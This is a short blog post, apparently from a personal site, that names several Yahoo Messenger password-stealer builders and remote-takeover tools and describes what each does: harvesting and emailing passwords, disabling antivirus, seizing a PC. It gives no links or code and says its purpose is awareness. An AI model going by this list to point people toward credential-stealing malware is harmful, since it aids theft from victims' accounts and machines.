The big Boss , used with Yahoo messenger lets u take over victims Pc
Many more exists,will be disclosing all of them
Even u can contribute
AAh!!
The following tools m gonna list now are some of the dangerous tools available on www, which may be used on u by an unethical hacker. I want you to be well aware of all the possibilities.
They are Free to download and it takes seconds to crush up personal computer if wired online, m not disclosing the links to these tools .
Lord PS
Lord PS is an editor that will create a password stealer/virus that emails you the passwords with tons of options, options may include taking over ur entire pc and disallowing u to access any of the files
Hosein PS v1.6
Does the same job with above with less options/features, another yahoo pass stealer
Fucker PS
This is a strong multi-password stealer that will grab passwords from all the most commonly used programs/services, msn, yahoo etc
JPS v1.8
Another password grabber/stealer - e mailer that is more focuced on Yahoo messenger
Demon PS v2.3
Yahoo messenger password stealer/mailer with anti virus kill options
and other system features
Tro messenger
The big Boss , used with Yahoo messenger lets u take over victims Pc
Many more exists,will be disclosing all of them
Even u can contribute
Subscribe to: Posts (Atom)
BLOG ARCHIVE
ABOUT ME
- SAINATH GUPTA
- Entrepreneur, Student at IIIT, Geek & Blogger. I am a person who loves to make load of frndz.. well thats my favorite hobby! I always look forward to make new friends, equally valuing the old ones, do feel free to say hi :)
